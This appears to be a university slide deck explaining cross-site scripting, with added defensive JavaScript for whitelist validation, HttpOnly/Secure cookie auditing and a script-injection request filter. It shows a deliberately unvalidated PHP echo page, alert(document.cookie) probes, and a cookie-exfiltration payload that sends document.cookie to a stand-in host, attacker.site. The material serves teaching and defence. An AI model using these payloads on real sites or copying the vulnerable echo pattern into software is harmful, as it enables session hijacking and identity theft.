Cross Site Scripting
Firas Mohamed Tahir
Supervised by: Dr. Lo’ay Twalbeh
Introduction
• There are many techniques an intruder can use to compromise a web application.
• One such technique is called XSS, or cross site scripting.
• With the help of such a vulnerability, an intruder can easily use a social engineering trick to make users reveal their access credentials.
• It can also invoke an automated script to perform some operations.
Introduction (cont.)
• Cross site scripting (CSS for short, but sometimes abbreviated as XSS).
• XSS is one of the most common application-level attacks that hackers use to sneak into web applications.
• XSS is an attack on the privacy of the clients of a particular web site, which can lead to a total breach of security when customer details are stolen or manipulated.
• The common languages used for XSS include JavaScript, VBScript, HTML, C++, ActiveX and Flash.
Introduction (cont.)
• Many web sites make extensive use of client-side scripts (mostly written in JavaScript).
• Many applications are designed to permit the input of HTML tags for displaying HTML-formatted data.
• These tags can be used by malicious users to attack other users by inserting scripts or malicious applets.
• Unlike most attacks, which involve two parties (the attacker and the victim client), an XSS attack involves three parties: the attacker, a client and the web site.
Introduction (cont.)
• Such attacks are the result of poor input validation; they use a combination of HTML and JavaScript.
• An intruder can misguide the client and perform various attacks, from DoS (by opening an enormous number of windows on the client side) to embedding malicious FORM tags at the right place.
• A malicious user may be able to trick users into revealing sensitive information by modifying the behaviour of an existing form or by embedding scripts.
• Scripting tags that take advantage of XSS include <script>, <applet>, <object>, <embed> and <form>.
Introduction (cont.)
• Recent trends in information systems security show a significant increase in cross site scripting (XSS) vulnerabilities.
• Due to the convergence of control system technology and information systems technology, a determined attacker could use knowledge of XSS vulnerabilities to access a control system network.
• XSS involves posting malicious web programming instructions to a web-accessible location, contrary to the intentions of the location's owner.
• The goal of an XSS attack is to steal the client's cookies, or any other sensitive information which can identify the client to the web site.
Scope and feasibility
How it is performed
• Suppose we are using an application which takes some data from the user, say a username and password, and then displays that data.
• If this data is not validated properly, it can create some real surprises, as we can see below.
• Consider the following PHP code, which takes some data and then displays it:
Scope and feasibility (cont.)
**code listing for test_submit.php**

```php
<?php
$Name = $_POST['name'];
echo "<html> <body>";
echo $Name;              // the posted value is echoed back without any validation or encoding
echo "</body> </html>";
?>
```

It is clear that the data is posted from a form. Assume that the previous form contains a textbox called ‘name’; it will then have something similar to the following code.
Scope and feasibility (cont.)
**code listing for test.php**

```html
<html>
<head>
<title>xss test page</title>
</head>
<body>
<form name="form1" action="test_submit.php" method="post">
Name: <input type="text" name="name">
<input type="submit" value="submit">
</form>
</body>
</html>
```
Variations on the theme
• When a user presses the submit button, the data in the textbox is passed to test_submit.php. From the code it is clear that the posted data is stored in a variable called ‘name’.
• So if a user posts a simple value, it is simply displayed on the screen. But suppose a user enters the following in the name field:
<script language=javascript>alert(document.name);</script>
Then he will get a message box, as shown in the following picture:
Variations on the theme (cont.)
• From the picture it is clear that if the entered data is not validated properly, a malicious user can execute his own HTML or script code.
• This can lead to a potentially dangerous situation, especially if your application stores critical information or holds something from which an attacker can benefit.
• With a combination of HTML and JavaScript, an attacker can misguide users and spoof their real identity.
Full explanation - the CSS technique (cont.)
The request would be:

```http
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host: www.vulnerable.site
```

And the response would be:

```html
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker <BR>
Welcome to our system
...
</HTML>
```
Full explanation - the CSS technique (cont.)
• Such a link looks like:
http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
• The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows:

```http
GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
Host: www.vulnerable.site
```

• And the vulnerable site's response would be:

```html
<HTML>
<Title>Welcome!</Title>
Hi <script>alert(document.cookie)</script> <BR>
Welcome to our system
...
</HTML>
```
Full explanation - the CSS technique (cont.)
• The malicious link would be:
http://www.vulnerable.site/welcome.cgi?name=<script>window.open("http://www.attacker.site/collect.cgi?cookie="%2Bdocument.cookie)</script>
• And the response page would look like:
Full explanation - the CSS technique (cont.)

```html
<HTML>
<Title>Welcome!</Title>
Hi <script>window.open("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script> <BR>
Welcome to our system
...
</HTML>
```
Protecting from attack
How to protect from such attacks?
• A straightforward solution to this problem is disabling the scripting language, but for many reasons it is not possible to use this solution. There are various ways by which such attacks can be prevented.
1) Always properly validate the data: to secure your web applications from such attacks it is necessary to check the user data for any unnecessary characters or input strings. Make sure that you check the POST data, URL strings, cookies etc. and remove any unwanted character or string like <script> from them. This is the general way by which a malicious user tries to compromise your web application.
Protecting from attack (cont.)
2) Limit input lengths: this is another way of securing web applications from malicious inputs. Always make sure that you restrict the length of the variables you use in the application and check them properly for any violations.
3) Use the HTTP POST method rather than GET: GET makes the web application more vulnerable to such attacks, as someone can easily play with the input. If possible, prefer the POST method to the GET method.
4) Verify the cookie data: web applications use cookies for managing the state of the communication. As they are stored on the client side, it is necessary to check the cookie data before using it.
5) Filter output: always filter the output content that is going to be displayed. This will reduce the chance of XSS attacks.
Securing a site against CSS attacks
How to perform input validation
• Check if the input is what you expect - do not try to check for "bad input".
• Blacklist testing is no solution - blacklists are never complete!
• Whitelist testing is better - only what you expect will pass - (correct) regular expressions.
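As an added example, not code from the slides, the following Node.js module applies the advice of the last two sections to the test_submit.php / welcome.cgi scenario: a whitelist regular expression instead of a list of bad strings, a length limit enforced on the server (the slides' client-side maxlength can be bypassed by a direct URL request), and HTML encoding of every echoed value. The function names, the whitelist pattern and the 10-character limit (mirroring the maxlength="10" shown later in the deck) are assumptions made for the example.

```javascript
// Added example (not from the original slides): server-side input validation
// and output encoding for the name-echoing page, written as a Node.js module.
// Function names, the whitelist pattern and the length limit are assumptions.

// Whitelist: a display name may contain only letters, digits, spaces, dots,
// apostrophes and hyphens. Anything else is rejected, so there is no list of
// "bad" strings that has to be kept complete.
const NAME_PATTERN = /^[A-Za-z0-9 .'-]+$/;
// Enforced on the server: a client-side maxlength attribute is only a hint.
const NAME_MAX_LENGTH = 10;

// Returns { ok: true, value } for acceptable input, { ok: false, reason } otherwise.
function validateName(raw) {
  if (typeof raw !== 'string') return { ok: false, reason: 'missing' };
  const value = raw.trim();
  if (value.length === 0) return { ok: false, reason: 'empty' };
  if (value.length > NAME_MAX_LENGTH) return { ok: false, reason: 'too long' };
  if (!NAME_PATTERN.test(value)) return { ok: false, reason: 'unexpected characters' };
  return { ok: true, value };
}

// Output encoding: the five characters that let text break out of an HTML text
// node or a quoted attribute. Applied to every echoed value, even one that passed
// validation, so a later relaxation of the whitelist cannot reintroduce XSS.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  })[ch]);
}

// Hardened equivalent of test_submit.php: validate first, encode on output.
// Returns the HTTP status and body the handler would send.
function renderWelcome(postedName) {
  const check = validateName(postedName);
  if (!check.ok) {
    // Reject with a fixed message; the offending input is not echoed back.
    return { status: 400, body: '<html><body>Invalid name (' + check.reason + ')</body></html>' };
  }
  return {
    status: 200,
    body: '<html><body>Hi ' + escapeHtml(check.value) + '<br>Welcome to our system</body></html>',
  };
}

module.exports = { validateName, escapeHtml, renderWelcome };
```

With this in place the deck's `<script>alert(document.cookie)</script>` value never reaches the page: the whitelist rejects it before rendering, and even a value the whitelist accepts is encoded, so `O'Brien` is emitted as `O&#39;Brien` rather than as a raw quote.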
Securing a site against CSS attacks (cont.)
• Cookie options mitigate the impact
• Complicate attacks on cookies
• "httpOnly" cookies
– Prevent disclosure of the cookie via DOM access
• IE only currently
• Use with care; compatibility problems may occur
– But: cookies are sent in each HTTP request
• E.g. the TRACE method can be used to disclose the cookie
– Passwords may still be stolen via XSS
• "secure" cookies
– Cookies are only sent over SSL
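As an added example, not part of the original slides, this Node.js snippet shows the two cookie options above from the server side: building a session cookie that carries the HttpOnly and Secure attributes, and auditing Set-Cookie headers (as seen in a proxy capture or a log review) for the attributes they lack. The function names are assumptions, and the sample headers are constructed for the demonstration.

```javascript
// Added example (not from the original slides): issuing a cookie with the
// HttpOnly and Secure attributes and auditing Set-Cookie headers for them.
// Function names are assumptions; the sample headers are constructed.

// Build a Set-Cookie header value. HttpOnly keeps the cookie out of
// document.cookie, so the deck's alert(document.cookie) payload reads nothing;
// Secure restricts the cookie to SSL/TLS connections.
function buildSetCookie(name, value, { httpOnly = true, secure = true, path = '/' } = {}) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error('invalid cookie name');
  if (/[;,\s"]/.test(value)) throw new Error('invalid cookie value');
  const parts = [name + '=' + value, 'Path=' + path];
  if (httpOnly) parts.push('HttpOnly');
  if (secure) parts.push('Secure');
  return parts.join('; ');
}

// Parse one Set-Cookie header value into { name, value, attributes }.
// Attribute names are compared case-insensitively, as browsers do.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const attributes = {};
  for (const a of attrs) {
    if (!a) continue;
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : a.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attributes };
}

// Audit: which of the two mitigating attributes are missing from a header?
function missingCookieFlags(header) {
  const { attributes } = parseSetCookie(header);
  const missing = [];
  if (!attributes.httponly) missing.push('HttpOnly');
  if (!attributes.secure) missing.push('Secure');
  return missing;
}

// Constructed sample headers for the audit.
const SAMPLE_HEADERS = [
  'SESSIONID=abc123; Path=/',             // neither attribute: readable from script, sent over plain HTTP
  'SESSIONID=abc123; Path=/; HttpOnly',   // Secure missing
  buildSetCookie('SESSIONID', 'abc123'),  // both attributes present
];

function auditAll(headers) {
  return headers.map((h) => ({ header: h, missing: missingCookieFlags(h) }));
}

module.exports = { buildSetCookie, parseSetCookie, missingCookieFlags, auditAll, SAMPLE_HEADERS };
```

The audit only reports what the header lacks; as the slide notes, HttpOnly stops `document.cookie` reads but not the cookie being sent with each request, so it limits the impact of an XSS bug rather than removing it.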
Securing a site against CSS attacks (cont.)
• Web application firewalls
– Check for malicious input values
– Check for modification of read-only parameters
– Block requests or filter out parameters
• Can help to protect "old" applications
– No source code available
– No know-how available
– No time available
• No general solution
– Usefulness depends on the application
– Not all applications can be protected
What went wrong?
This is NO solution!
• SSL:
– The attack is not based on communication security flaws
– The attack is based on application security problems
• Client-side input checking:
– Can be subverted easily
– Direct URL access bypasses it:

```html
<form method="GET" action="/file.jsp">
<input type="text" name="fname" maxlength="10">
```

```http
GET /file.jsp?fname=123456789012345
```
What went wrong? (cont.)
• By the way
• Web services are affected by XSS too
– They are becoming more and more standard
– The access protocol is often HTTP
– Data transfer uses XML
• Attack: submitting SOAP response values as request values
• Often HTML rendering engines are used for display
– This forces "traditional" XSS attack code into the output
How Sanctum's AppShield protects against CSS attacks (cont.)
• In the example, there is a parameter whose value contains the string <script>window.open("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script>. Upon spotting this illegal pattern, AppShield blocks the request and logs the attack attempt.
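As an added example, not code from the slides or from Sanctum's product, the following Node.js snippet implements a minimal request-inspection step of the kind described on this slide and the earlier web application firewall slide: it decodes the query string the way the application would, matches each parameter value against a script-injection pattern, and returns a block decision with a log line, or passes the request through. The names, the pattern and the sample requests (the deck's own welcome.cgi requests, plus a malformed one) are assumptions made for the example. It is a perimeter check with a pattern list, so it carries the limitation the deck already states about blacklists and should sit in front of, not instead of, application-level validation.

```javascript
// Added example (not from the original slides or any product): a minimal
// perimeter filter that decodes request parameters, matches them against a
// script-injection pattern and either blocks-and-logs or passes the request.
// Names, the pattern and the sample requests are assumptions for the demo.

// Pattern for the injection shapes shown in the deck: a <script> tag, a
// javascript: URL, or an inline on*= event handler. Case-insensitive, and
// tolerant of whitespace inside the tag.
const SCRIPT_INJECTION = /<\s*\/?\s*script\b|javascript\s*:|\bon\w+\s*=/i;

// Parse "name=value&..." from a request target, percent-decoding each piece.
// Decoding first matters: the deck's link encodes "+" as %2B, and a check on
// the raw bytes would compare a different string than the application sees.
// Throws URIError on malformed percent-encoding, which the caller treats as a block.
function parseQuery(target) {
  const q = target.indexOf('?');
  if (q === -1) return {};
  const params = {};
  for (const pair of target.slice(q + 1).split('&')) {
    if (!pair) continue;
    const i = pair.indexOf('=');
    const rawKey = i === -1 ? pair : pair.slice(0, i);
    const rawVal = i === -1 ? '' : pair.slice(i + 1);
    params[decodeURIComponent(rawKey.replace(/\+/g, ' '))] =
      decodeURIComponent(rawVal.replace(/\+/g, ' '));
  }
  return params;
}

// Inspect one request line. Returns { action: 'pass' | 'block', param, log }.
function inspectRequest(requestLine, clientIp) {
  const [method, target] = requestLine.split(' ');
  const path = target.split('?')[0];
  let params;
  try {
    params = parseQuery(target);
  } catch (e) {
    // Undecodable input cannot be validated, so it is not forwarded.
    return { action: 'block', param: null, log: clientIp + ' ' + method + ' ' + path + ' blocked: malformed encoding' };
  }
  for (const [name, value] of Object.entries(params)) {
    if (SCRIPT_INJECTION.test(value)) {
      // Log the parameter name and a truncated copy of the value for the analyst;
      // the full value stays in the request capture rather than the log line.
      const excerpt = value.length > 40 ? value.slice(0, 40) + '...' : value;
      return {
        action: 'block',
        param: name,
        log: clientIp + ' ' + method + ' ' + path + ' blocked: script pattern in "' + name + '": ' + JSON.stringify(excerpt),
      };
    }
  }
  return { action: 'pass', param: null, log: null };
}

// Constructed sample requests: the deck's benign and malicious welcome.cgi
// requests, plus one with broken percent-encoding.
const SAMPLE_REQUESTS = [
  'GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0',
  'GET /welcome.cgi?name=<script>window.open("http://www.attacker.site/collect.cgi?cookie="%2Bdocument.cookie)</script> HTTP/1.0',
  'GET /welcome.cgi?name=%ZZ HTTP/1.0',
];

module.exports = { parseQuery, inspectRequest, SAMPLE_REQUESTS, SCRIPT_INJECTION };
```

Run over SAMPLE_REQUESTS, the first request passes, the second is blocked with a log line naming the `name` parameter, and the third is blocked because it cannot be decoded. The truncated excerpt in the log is deliberate: a log viewer that renders entries as HTML is itself a place where the deck's "traditional XSS code in output" point applies, so the log line should be treated as untrusted data by whatever displays it.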
Conclusion
• Cross-site scripting is extremely dangerous
– Identity theft, impersonation
• Cause: missing or insufficient input validation
• XSS prevention best practices
– Implement XSS prevention in the application
– Do not assume input values are benign
– Do not trust client-side validation
– Check and validate all input before processing
– Do not echo any input value without validation
– Use one conceptual solution in all applications